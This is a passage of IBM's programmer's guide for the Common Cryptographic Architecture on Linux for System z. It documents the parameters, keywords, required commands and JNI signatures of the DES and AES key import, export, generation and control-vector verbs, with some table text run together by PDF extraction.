on page 205 +| v “Symmetric Key Import2 (CSNDSYI2)” on page 208 +©CopyrightIBMCorp.2007,2011 99 + +Clear Key Import (CSNBCKI) +Clear Key Import (CSNBCKI) +Use the Clear Key Import verb to import a clear DATAkey that is to be used to encipher or decipher data. +This verb can import only DATAkeys. The Clear Key Import verb accepts an 8-byte clear DATAkey, +enciphers it under the master key, and returns the encrypted DATAkey in operational form in an internal +key token. +If the clear key value does not have odd parity in the low-order bit of each byte, the verb returns a warning +value in the reason_code parameter. This verb does not adjust the parity of the key. +Note: To import 16-byte or 24-byte DATAkeys, use the Multiple Clear Key Import verb that is described in +“Multiple Clear Key Import (CSNBCKM)” on page 179. +Format +CSNBCKI( +return_code, +reason_code, +exit_data_length, +exit_data, +clear_key, +key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +clear_key +Direction: Input Type: String +The clear_key specifies the 8-byte clear key value to import. +key_identifier +Direction: Input/Output Type: String +A64-byte string that is to receive the internal key token. “Key tokens, key labels, and key identifiers” +on page 15 describes the internal key token. +Restrictions +None +Required commands +| This verb requires the Clear Key Import/Multiple Clear Key Import - DES command (offset X'00C3') to be +| enabled in the active role. +Note: Arole with offset X'00C3' enabled can also use the Multiple Clear Key Import verb with the DES +algorithm. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBCKIJ. See “Building Java +applications to use with the CCAJNI” on page 16. +100 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Clear Key Import (CSNBCKI) +The parameters for CSNBCKIJ are shown here. +Format +public native void CSNBCKIJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] clear_key, +byte[] target_key_identifier +); +Chapter5.ManagingAESandDEScryptographickeys 101 + +Control Vector Generate (CSNBCVG) +Control Vector Generate (CSNBCVG) +The Control Vector Generate verb builds a control vector from keywords specified by the key_type and +rule_array parameters. +Format +CSNBCVG( +return_code, +reason_code, +exit_data_length, +exit_data, +key_type, +rule_array_count, +rule_array, +reserved, +control_vector ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_type +Direction: Input Type: String +Astring variable containing a keyword for the key type. The keyword is eight bytes in length, left +justified, and padded on the right with space characters. It is taken from the following list: +CIPHER DATAC IKEYXLAT OPINENC +CVARDEC DATAM IMPORTER PINGEN +CVARENC DATAMV IPINENC PINVER +CVARPINE DECIPHER KEYGENKY SECMSG +CVARXCVL DKYGENKY MAC +CVARXCVR ENCIPHER MACVER +DATA EXPORTER OKEYXLAT +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb. Each keyword is left justified in 8-byte fields, +and padded on the right with blanks.All keywords must be in contiguous storage. “Key Token Build +(CSNBKTB)” on page 155 illustrates the key type and key usage keywords that can be combined in +the Control Vector Generate and Key Token Build verbs to create a control vector. +| See Figure3 on page 30 for the key usage keywords that can be specified for a given key type. The +rule_array keywords are shown here: +| AMEX-CSC DKYL0 EPINGEN KEYLN16 UKPT +| ANSIX9.9 DKYL1 EPINGENA LMTD-KEK VISA-PVV +| ANY DKYL2 EPINVER MIXED WRAP-ECB +| ANY-MAC DKYL3 EXEX NO-SPEC WRAP-ENH +| CLR8-ENC DKYL4 EXPORT NO-XPORT XLATE +| CPINENC DKYL5 GBP-PIN NOOFFSET XPORT-OK +| CPINGEN DKYL6 GBP-PINO NOT-KEK +| CPINGENA DKYL7 IBM-PIN OPEX +| CVVKEY-A DMAC IBM-PINO OPIM +| CVVKEY-B DMKEY IMEX PIN +102 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Control Vector Generate (CSNBCVG) +| DALL DMPIN IMIM REFORMAT +| DATA DMV IMPORT SINGLE +| DDATA DOUBLE INBK-PIN SMKEY +| DEXP DPVR KEY-PART SMPIN +| DIMP ENH-ONLY KEYLN8 TRANSLAT +Notes: +1. When the KEYGENKY key type is coded, either CLR8-ENC or UKPT must be specified in +rule_array. +2. When the SECMSG key_type is coded, either SMKEY or SMPIN must be specified in the +rule_array. +3. Keywords ENH-ONLY, WRAP-ECB, and WRAP-ENH were introduced with CCA4.1.0. +reserved +Direction: Input Type: String +The reserved parameter must be a variable of eight bytes of X'00'. +control_vector +Direction: Output Type: String +A16-byte string variable in application storage where the verb returns the generated control vector. +Restrictions +None +Required commands +None +Usage notes +See the key_type parameter on page 155 for an illustration of key type and key usage keywords that can +be combined in the Control Vector Generate and Key Token Build verbs to create a control vector. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBCVGJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBCVGJ are shown here. +Format +public native void CSNBCVGJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_type, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] reserved_field_1, +byte[] control_vector); +Chapter5.ManagingAESandDEScryptographickeys 103 + +Control Vector Translate (CSNBCVT) +Control Vector Translate (CSNBCVT) +The Control Vector Translate verb changes the control vector used to encipher an external DES key. +| Detailed information about control vectors and how to use this verb can be found inAppendixD, “Control +| vectors and changing control vectors with the Control Vector Translate verb,” on page 463. +Format +CSNBCVT( +return_code, +reason_code, +exit_data_length, +exit_data, +KEK_key_identifier, +source_key_token, +array_key_left_identifier, +mask_array_left, +array_key_right_identifier, +mask_array_right, +rule_array_count, +rule_array, +target_key_token ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +KEK_key_identifier +Direction: Input Type: String +Apointer to a string variable containing an operational key-token or the key label of an operational +key-token record containing the key-encrypting key. The control vector in the key token must specify +the key type IMPORTER, EXPORTER, IKEYXLAT, or OKEYXLAT. +source_key_token +Direction: Input Type: String +Apointer to a string variable containing the external DES key-token with the key and control vector to +be processed. +array_key_left_identifier +Direction: Input Type: String +Apointer to a string variable containing an operational DES key-token or a key label of an operational +DES key-token record that deciphers the left mask-array. The key token must contain a control vector +specifying a CVARXCVLkey-type. The CVARXCVLkey must be single length. +mask_array_left +Direction: Input Type: String +Apointer to a string variable containing the mask array enciphered under the left-array key. +array_key_right_identifier +Direction: Input Type: String +Apointer to a string variable containing an operational DES key-token or the key label of an +operational DES key-token record that deciphers the right mask-array. The key token must contain a +control vector specifying a CVARXCVR key-type. The CVARXCVR key must be single length. +104 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Control Vector Translate (CSNBCVT) +mask_array_right +Direction: Input Type: String +Apointer to a string variable containing the mask array enciphered under the right-array key. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0, 1, or 2. +rule_array +Direction: Input Type:Array +Apointer to a string variable containing an array of keywords. The keywords are eight bytes in length +and must be left-aligned and padded on the right with space characters. The rule_array keywords are +descrobed in Table21. +Table21.KeywordsforControlVectorTranslatecontrolinformation +Keyword Description +Parityadjustment(One,optional) +ADJUST Ensuresthatalltarget-keybyteshaveoddparity.Thisisthedefault. +NOADJUST Preventstheparityofthetargetkeyfrombeingaltered. +Keyhalfprocessingmode(One,optional) +LEFT Causesan8-bytesourcekey,orthelefthalfofa16-bytesourcekey,tobeprocessedwith +theresultplacedintobothhalvesofthetargetkey.Thisisthedefault. +RIGHT Causestherighthalfofa16-bytesourcekeytobeprocessedwiththeresultplacedinto +onlytherighthalfofthetargetkey.Thelefthalfofthetargetkeyisunchanged. +BOTH Causesbothhalvesofa16-bytesourcekeytobeprocessedwiththeresultplacedinto +correspondinghalvesofthetargetkey.WhenyouusetheBOTHkeyword,themaskarray +mustbeabletovalidatethetranslationofbothhalves. +SINGLE Causesthelefthalfofthesourcekeytobeprocessedwiththeresultplacedintoonlythe +lefthalfofthetarget.Therighthalfofthetargetkeyisunchanged. +target_key_token +Direction: Input/Output Type: String +Apointer to a string variable containing an external DES key-token with the new control vector. This +key token contains the key halves with the new control vector. +Restrictions +None +Required commands +| This verb requires the Control Vector Translate command (offset X'00D6') to be enabled in the active role. +Usage notes +Consider that Control Vector Translate represents the capability to translate, by definition, the limitations on +the operations that a key can be used for, into a different set of limitations. The control vector is the heart +of security against the misuse of keys that were defined for a specific purpose. The masks that control +what the key can be translated into being able to do (the right and left masks) are themselves +single-length (8-byte), and are encrypted with DES. Therefore, the protection against translating the key to +have more power (or less power) than it did before are protected with single-DES. This reduces the +Chapter5.ManagingAESandDEScryptographickeys 105 + +Control Vector Translate (CSNBCVT) +security (somewhat) of a double-length DES key. You cannot decrypt the double-length key with this +approach, or gain access to a key that you did not otherwise have the rights to use. But you can make a +key which you already have access to, on a system you already have access to, more powerful than it +was before if you can break single-DES. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBCVTJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBCVTJ are shown here. +Format +public native void CSNBCVTJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] kek_key_identifier, +byte[] source_key_token, +byte[] array_key_left, +byte[] mask_array_left, +byte[] array_key_right, +byte[] mask_array_right, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] target_key_token); +106 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Variable Encipher (CSNBCVE) +Cryptographic Variable Encipher (CSNBCVE) +This verb is used to encrypt plaintext using a CVARENC key to produce ciphertext using the Cipher Block +Chaining (CBC) method. The plaintext must be a multiple of eight bytes in length. +Specify the following parameters to encrypt plaintext: +v An operational DES key-token or a key label of an operational DES key-token record that contains the +key to be used to encrypt the plaintext with the c-variable_encrypting_key_identifier parameter. The +control vector in the key token must specify the CVARENC key-type. +v The length of the plaintext, which is the same as the length of the returned ciphertext, with the +text_length parameter. The plaintext must be a multiple of eight bytes in length. +v The plaintext with the plaintext parameter. +v The initialization vector with the initialization_vector parameter. +v Avariable for the returned ciphertext with the ciphertext parameter. The length of this field is specified +with the text_length variable. +This verb does the following: +v Uses the CVARENC key and the initialization value with the CBC method to encrypt the plaintext. +v Returns the encrypted plaintext in the variable pointed to by the ciphertext parameter. +Format +CSNBCVE( +return_code, +reason_code, +exit_data_length, +exit_data, +c-variable_encrypting_key_identifier, +text_length, +plaintext, +initialization_vector, +ciphertext ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +c-variable_encrypting_key_identifier +Direction: Input Type: String +Apointer to a string variable containing an operational DES key-token or a key label of an operational +DES key-token record. The key token must contain a control vector that specifies a CVARENC +key-type. +text_length +Direction: Input Type: Integer +Apointer to an integer variable containing the length of the plaintext variable and the ciphertext +variable. +plaintext +Direction: Input Type: String +Apointer to is a string variable containing the plaintext to be encrypted. +initialization_vector +Chapter5.ManagingAESandDEScryptographickeys 107 + +Cryptographic Variable Encipher (CSNBCVE) +Direction: Input Type: String +Apointer to a string variable containing the 8-byte initialization vector that the verb uses in encrypting +the plaintext. +ciphertext +Direction: Output Type: String +Apointer to a string variable containing the ciphertext returned by the verb. +Restrictions +The text length must be a multiple of eight bytes. +The minimum length of text that the security server can process is eight bytes and the maximum is 256 +bytes. +Required commands +| This verb requires the Cryptographic Variable Encipher command (offset X'00DA') to be enabled in the +| active role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBCVEJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBCVEJ are shown here. +Format +public native void CSNBCVEJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] cvarenc_key_id, +hikmNativeInteger text_length, +byte[] plain_text, +byte[] init_vector, +byte[] cipher_text); +108 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Data Key Export (CSNBDKX) +Data Key Export (CSNBDKX) +Use the Data Key Export verb to re-encipher a data-encrypting key (key type of DATAonly) from +encryption under the master key to encryption under an exporter key-encrypting key. The re-enciphered +key is in a form suitable for export to another system. +The Data Key Export verb generates a key token with the same key length as the input token's key. +Format +CSNBDKX( +return_code, +reason_code, +exit_data_length, +exit_data, +source_key_identifier, +exporter_key_identifier, +target_key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +source_key_identifier +Direction: Input/Output Type: String +A64-byte string for an internal key token or label that contains a data-encrypting key to be +re-enciphered. The data-encrypting key is encrypted under the master key. +exporter_key_identifier +Direction: Input/Output Type: String +A64-byte string for an internal key token or key label that contains the exporter key_encrypting key. +The data-encrypting key above will be encrypted under this exporter key_encrypting key. +target_key_identifier +Direction: Input/Output Type: String +A64-byte field that is to receive the external key token, which contains the re-enciphered key that has +been exported. The re-enciphered key can now be exchanged with another cryptographic system. +Restrictions +For security reasons, requests will fail by default if they use an equal key halves exporter to export a key +with unequal key halves. You must have access control point 'Data Key Export - Unrestricted' explicitly +enabled if you want to export keys in this manner. +Required commands +| This verb requires the Data Key Export command (offset X'010A') to be enabled in the active role. +| By also specifying the Data Key Export - Unrestricted command (offset X'0277'), you can permit a less +| secure mode of operation that enables an equal key-halves EXPORTER key-encrypting-key to export a +| key having unequal key-halves (key parity bits are ignored). +Usage notes +None +Chapter5.ManagingAESandDEScryptographickeys 109 + +Data Key Export (CSNBDKX) +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBDKXJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBDKXJ are shown here. +Format +public native void CSNBDKXJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] source_key_identifier, +byte[] exporter_key_identifier, +byte[] target_key_token +); +110 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Data Key Import (CSNBDKM) +Data Key Import (CSNBDKM) +Use the Data Key Import verb to import an encrypted source DES single-length, double-length or +triple-length DATAkey and create or update a target internal key token with the master key enciphered +source key. +Format +CSNBDKM( +return_code, +reason_code, +exit_data_length, +exit_data, +source_key_token, +importer_key_identifier, +target_key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +source_key_token +Direction: Input Type: String +64-byte string variable containing the source key to be imported. The source key must be an external +token or null token. The external key token must indicate that a control vector is present; however, the +control vector is usually valued at zero.Adouble-length key that should result in a default DATA +control vector must be specified in a version X'01' external key token. Otherwise, both single and +double-length keys are presented in a version X'00' key token. For the null token, the verb will process +this token format as a DATAkey encrypted by the importer key and a null (all zero) control vector. +importer_key_identifier +Direction: Input/Output Type: String +A64-byte string variable containing the (IMPORTER) transport key or key label of the transport key +used to decipher the source key. +target_key_identifier +Direction: Output Type: String +A64-byte string variable containing a null key token or an internal key token. The key token receives +the imported key. +Restrictions +For security reasons, requests will fail by default if they use an equal key halves importer to import a key +with unequal key halves. You must have access control point 'Data Key Import - Unrestricted' explicitly +enabled if you want to import keys in this manner. +Required commands +This verb requires the Data Key Import command (offset X'0109') to be enabled in the active role. +| By also specifying the Data Key Import - Unrestricted command (offset X'027C'), you can permit a less +| secure mode of operation that enables an equal key-halves IMPORTER key-encrypting key to import a +| key having unequal key-halves (key parity bits are ignored). +Chapter5.ManagingAESandDEScryptographickeys 111 + +Data Key Import (CSNBDKM) +Usage notes +This verb does not adjust the key parity of the source key. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBDKMJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBDKMJ are shown here. +Format +public native void CSNBDKMJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_lengthh, +byte[] exit_data, +byte[] source_key_token, +byte[] importer_key_identifier, +byte[] target_key_identifier +); +112 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Diversified Key Generate (CSNBDKG) +Diversified Key Generate (CSNBDKG) +Use the Diversified Key Generate verb to generate a key based on the key-generating key, the processing +method, and the parameter supplied. The control vector of the key-generating key also determines the +type of target key that can be generated. +To use this verb, specify the following: +v The rule_array keyword to select the diversification process. +v The operational key-generating key from which the diversified keys are generated. The control vector +associated with this key restricts the use of this key to the key generation process. This control vector +also restricts the type of key that can be generated. +v The data and length of data used in the diversification process. +v The generated-key could be an internal token or a skeleton token containing the desired CV of the +generated-key. The generated key CV must be one that is permitted by the processing method and the +key-generating key. The generated key will be returned in this parameter. +v Akey generation method keyword. +This verb generates diversified keys as follows: +v Determines if it can support the process specified in the rule_array. +v Recovers the key-generating key and checks the key-generating key class and the specified usage of +the key-generating key. +v Determines that the control vector in the generated-key token is permissible for the specified processing +method. +v Determines that the control vector in the generated-key token is permissible by the control vector of the +key-generating key. +v Determines the required data length from the processing method and the generated-key CV. Validates +the data_length. +v Generates the key appropriate to the specific processing method.Adjusts parity of the key to odd. +Creates the internal token and returns the generated diversified key. +Format +CSNBDKG( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +generating_key_identifier, +data_length, +data, +key_identifier, +generated_key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 1, 2, or 3. +Chapter5.ManagingAESandDEScryptographickeys 113 + +Diversified Key Generate (CSNBDKG) +rule_array +Direction: Input Type: String +The keyword that provides control information to the verb. The processing method is the algorithm +used to create the generated key. The keyword is left justified and padded on the right with blanks. +The rule_array keywords are described in Table22. +Table22.KeywordsforDiversifiedKeyGeneratecontrolinformation +Keyword Description +ProcessingMethodforgeneratingorupdatingdiversifiedkeys(Onerequired) +CLR8-ENC Specifiesthateightbytesofcleardatashallbemultiplyencryptedwiththegeneratingkey.The +generating_key_identifiermustbeaKEYGENKYkeytypewithbit19ofthecontrolvectorsetto1. +Thecontrolvectoringenerated_key_identifiermustspecifyasingle-lengthkey.Thekeytypecan +beDATA,MAC,orMACVER. +Note: CIPHERclasskeysarenotsupported. +TDES-DEC Datasuppliedcouldbe8or16bytesofcleardata.Ifthegenerated_key_identifierspecifiesa +singlelengthkey,then8-bytesofdataisTDESdecryptedunderthegenerating_key_identifier.If +thegenerated_key_identifierspecifiesadoublelengthkey,then16-bytesofdataisTDESECB +modedecryptedunderthegenerating_key_identifier.Noformattingofdataisdonebefore +encryption.Thegenerating_key_identifiermustbeaDKYGENKYkeytype,withappropriateusage +bitsforthedesiredgeneratedkey. +TDES-ENC Datasuppliedcouldbe8or16bytesofcleardata.Ifthegenerated_key_identifierspecifiesa +singlelengthkey,then8bytesofdataisTDESencryptedunderthegenerating_key_identifier.If +thegenerated_key_identifierspecifiesadoublelengthkey,then16bytesofdataisTDESECB +modeencryptedunderthegenerating_key_identifier.Noformattingofdataisdonebefore +encryption.Thegenerating_key_identifiermustbeaDKYGENKYkeytype,withappropriateusage +bitsforthedesiredgeneratedkey.Thegenerated_key_identifiercanbeasingleordoublelength +key,withaCVthatispermittedbythegenerating_key_identifier. +TDES-XOR ThisoptioncombinesthefunctionoftheexistingTDES-ENCandSESS-XORintoonestep. +Thegeneratingkeymustbealevel0DKYGENKYandcannothavereplicatedhalves.Thesession +keygeneratedmustbedoublelengthandtheallowedkeytypesareDATA,DATAC,DATAM, +DATAMV,MAC,MACVER,SMPIN,andSMKEY.Keytypemustbeallowedbythegeneratingkey +controlvector. +TDESEMV2 ThisoptionsupportsgenerationofasessionkeybytheEMV2000algorithm(ThisEMV2000 +algorithmusesabranchfactorof2).Thegeneratingkeymustbealevel0DKYGENKYandcannot +havereplicatedhalves.Thesessionkeygeneratedmustbedoublelengthandtheallowedkey +typesareDATA,DATAC,DATAM,DATAMV,MAC,MACVER,SMPIN,andSMKEY.Keytypemust +beallowedbythegeneratingkeycontrolvector. +TDESEMV4 ThisoptionsupportsgenerationofasessionkeybytheEMV2000algorithm(ThisEMV2000 +algorithmusesabranchfactorof4).Thegeneratingkeymustbealevel0DKYGENKYandcannot +havereplicatedhalves.Thesessionkeygeneratedmustbedoublelengthandtheallowedkey +typesareDATA,DATAC,DATAM,DATAMV,MAC,MACVER,SMPIN,andSMKEY.Keytypemust +beallowedbythegeneratingkeycontrolvector. +ProcessingMethodforupdatingadiversifiedkey(optional) +SESS-XOR SpecifiestheVISAmethodforsessionkeygeneration.Datasuppliedcanbe8or16bytesofdata +dependingonwhetherthegenerating_key_identifierisasingleordoublelengthkey.The8or16 +bytesofdataisXORedwiththeclearvalueofthegenerating_key_identifier.The +generated_key_identifierhasthesamecontrolvectorasthegenerating_key_identifier.The +generating_key_identifiercanbeDATA,DATAC,,DATAM,DATAMV,MAC,orMACVERkeytypes. +| Key-wrappingmethod(One,optional) +|| USECONFG Specifiestowrapthekeyusingtheconfigurationsettingforthedefaultwrappingmethod.This +| keywordisignoredforAESkeys.Thisisthedefault.ThiskeywordwasintroducedwithCCA4.1.0. +|| WRAP-ENH Specifiestowrapthekeyusingthelegacywrappingmethod.ThiskeywordisignoredforAES +| keys.ThiskeywordwasintroducedwithCCA4.1.0. +114 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Diversified Key Generate (CSNBDKG) +Table22.KeywordsforDiversifiedKeyGeneratecontrolinformation (continued) +Keyword Description +|| WRAP-ECB Specifiestowrapthekeyusingtheenhancedwrappingmethod.ValidonlyforDESkeys.This +| keywordwasintroducedwithCCA4.1.0. +| Translationcontrol(Optional).Thisisvalidonlywithkey-wrappingmethodWRAP-ENHorwithUSECONFGwhen +| thedefaultwrappingmethodisWRAP-ENH.Thisoptioncannotbeusedonakeywithacontrolvectorvaluedto +| binaryzeros. +|| ENH-ONLY Specifiestorestrictthekeyfrombeingwrappedwiththelegacywrappingmethodafterithasbeen +| wrappedwiththeenhancedwrappingmethod.Setsbit56(ENH-ONLY)ofthecontrolvectorto1. +| ThiskeywordwasintroducedwithCCA4.1.0. +generating_key_identifier +Direction: Input/Output Type: String +The label or internal token of a key generating key. The type of key-generating key depends on the +processing method. +data_length +Direction: Input Type: Integer +The length of the data parameter that follows. Length depends on the processing method and the +generated key. +data +Direction: Input Type: String +Data input to the diversified key or session key generation process. Data depends on the processing +method and the generated_key_identifier. +key_identifier +Direction: Input/Output Type: String +This parameter is currently not used. It must be a 64-byte null token. +generated_key_identifier +Direction: Input/Output Type: String +The internal token of an operational key, a skeleton token containing the control vector of the key to be +generated, or a null token.Anull token can be supplied if the generated_key_identifier will be a +DKYGENKY with a CV derived from the generating_key_identifier.Askeleton token or internal token is +required when generated_key_identifier will not be a DKYGENKY key type or the processing method +is not SESS-XOR. For SESS-XOR, this must be a null token. On output, this parameter contains the +generated key. +Restrictions +None +Required commands +This verb requires the following commands to be enabled in the active role based on the keyword +specified for the process rule: +|||| +Rule-arraykeyword Offset Command +||| CLR8-ENC X'0040' DiversifiedKeyGenerate-CLR8-ENC +||| SESS-XOR X'0043' DiversifiedKeyGenerate-SESS-XOR +Chapter5.ManagingAESandDEScryptographickeys 115 + +Diversified Key Generate (CSNBDKG) +||| Rule-arraykeyword Offset Command +||| TDES-DEC X'0042' DiversifiedKeyGenerate-TDES-DEC +||| TDES-ENC X'0041' DiversifiedKeyGenerate-TDES-ENC +||| TDES-XOR X'0045' DiversifiedKeyGenerate-TDES-XOR +||| TDESEMV2orTDESEMV4 X'0046' DiversifiedKeyGenerate-TDESEMV2/TDESEMV4 +||| WRAP-ECBorWRAP-ENH X'013D' DiversifiedKeyGenerate-Allowwrappingoverride +|| anddefaultkey-wrapping keywords +| methodsettingdoesnot +| matchkeyword +| +| When a key-generating key of key type DKYGENKY is specified with control vector bits (19 - 22) of +| B'1111', the Diversified Key Generate - DKYGENKY - DALLcommand (offset X'0290') must also be +| enabled in the active role. +Note: Arole with offset X'0290' enabled can also use the PIN Change/Unblock verb with a DALLkey. +| When using the TDES-ENC or TDES-DEC modes, you can specifically enable generation of a +| single-length key or a double-length key with equal key-halves (an effective single-length key) by enabling +| the Diversified Key Generate - Single length or same halves command (offset X'0044'). +Usage notes +Refer toAppendixD, “Control vectors and changing control vectors with the Control Vector Translate verb,” +on page 463 for information on the control vector bits for the DKG key generating key. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBDKGJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBDKGJ are shown here. +Format +public native void CSNBDKGJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] generating_key_identifier, +hikmNativeInteger data_length, +byte[] data, +byte[] data_decrypting_key_identifier, +byte[] generated_key_identifier +); +116 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Export (CSNBKEX) +Key Export (CSNBKEX) +DATA +Use the Key Export verb to re-encipher any type of key (except an IMP-PKA) from encryption under a +master key variant to encryption under the same variant of an exporter key-encrypting key. The +re-enciphered key can be exported to another system. +If the key to be exported is a DATAkey, the Key Export verb generates a key token with the same key +length as the input token's key. +This verb supports the no-export bit that the Prohibit Export verb sets in the internal token. +Format +CSNBKEX( +return_code, +reason_code, +exit_data_length, +exit_data, +key_type, +source_key_identifier, +exporter_key_identifier, +target_key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_type +Direction: Input Type: String +The parameter is an 8-byte field that contains either a key type value or the keyword TOKEN. The +keyword is left-justified and padded on the right with blanks. +If the key type is TOKEN, CCAdetermines the key type from the control vector (CV) field in the +internal key token provided in the source_key_identifier parameter. +Key type values for the Key Export verb are: +CIPHER EXPORTER OPINENC +DATA IMPORTER PINGEN +DATAC IKEYXLAT PINVER +DATAM IPINENC TOKEN +DATAMV MAC +DECIPHER MACVER +ENCIPHER OKEYXLAT +For information about the meaning of the key types, see Table1 on page 27. +source_key_identifier +Direction: Input Type: String +A64-byte string of the internal key token that contains the key to be re-enciphered. This parameter +must identify an internal key token in application storage, or a label of an existing key in the DES key +storage file. +If you supply TOKEN for the key_type parameter, CCAlooks at the control vector in the internal key +token and determines the key type from this information. If you supply TOKEN for the key_type +parameter and supply a label for this parameter, the label must be unique in the DES key storage file. +Chapter5.ManagingAESandDEScryptographickeys 117 + +Key Export (CSNBKEX) +exporter_key_identifier +Direction: Input/Output Type: String +A64-byte string of the internal key token or key label that contains the exporter key-encrypting key. +This parameter must identify an internal key token in application storage, or a label of an existing key +in the key storage file. +If the NOCV bit is on in the internal key token containing the key-encrypting key, the key-encrypting +key itself (not the key-encrypting key variant) is used to encipher the generated key. +Control vectors are explained in “Control vector” on page 25 and the NOCV bit is shown in Table121 +on page 423. +target_key_identifier +Direction: Input/Output Type: String +The 64-byte field external key token that contains the re-enciphered key. The re-enciphered key can +be exchanged with another cryptographic system. +Restrictions +For security reasons, requests will fail by default if they use an equal key halves exporter to export a key +with unequal key halves. You must have access control point 'Key Export - Unrestricted' explicitly enabled +if you want to export keys in this manner. +Required commands +| This verb requires the Key Export command (offset X'0013') to be enabled in the active role. +| By also specifying the Key Export - Unrestricted command (offset X'0276'), you can permit a less secure +| mode of operation that enables an equal key-halves EXPORTER key-encrypting-key to export a key +| having unequal key-halves (key parity bits are ignored). +Usage notes +For Key Export, you can use the following combinations of parameters: +v Avalid key type in the key_type parameter and an internal key token in the source_key_identifier +parameter. The key type must be equivalent to the control vector specified in the internal key token. +v Akey_type parameter of TOKEN and an internal key token in the source_key_identifier parameter. The +source_key_identifier can be a label with TOKEN only if the label name is unique in the key storage. +The key type is extracted from the control vector contained in the internal key token. +v Avalid key type in the key_type parameter, and a label in the source_key_identifier parameter. +If internal key tokens are supplied in the source_key_identifier or exporter_key_identifier parameters, the +key in one or both tokens can be re-enciphered. This occurs if the master key was changed since the +internal key token was last used. The return and reason codes that indicate this do not indicate which key +was re-enciphered. Therefore, assume both keys have been re-enciphered. +Existing internal tokens created with key type MACD must be exported with either a TOKEN or DATAM +key type. The external CV will be DATAM CV. The MACD key type is not supported. +To export a double-length MAC generation or MAC verification key, it is recommended that a key type of +TOKEN be used. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKEXJ. See “Building Java +applications to use with the CCAJNI” on page 16. +118 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Export (CSNBKEX) +The parameters for CSNBKEXJ are shown here. +Format +public native void CSNBKEXJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_type, +byte[] source_key_identifier, +byte[] exporter_key_identifier, +byte[] target_key_token +); +Chapter5.ManagingAESandDEScryptographickeys 119 + +Key Generate (CSNBKGN) +Key Generate (CSNBKGN) +Use the Key Generate verb to generate anAES key of type DATA, or either one or two odd parity DES +keys of any type. The DES keys can be single-length (8-byte), double-length (16-byte), or, in the case of +DATAkeys, triple-length (24-byte). TheAES keys can be 16, 24 or 32 bytes in length. The Key Generate +verb does not produce keys in clear form; all keys are returned in encrypted form. When two keys are +generated (DES only), each key has the same clear value, although this clear value is not exposed +outside the secure cryptographic feature. +ForAES, the verb returns only one copy of the key, enciphered under 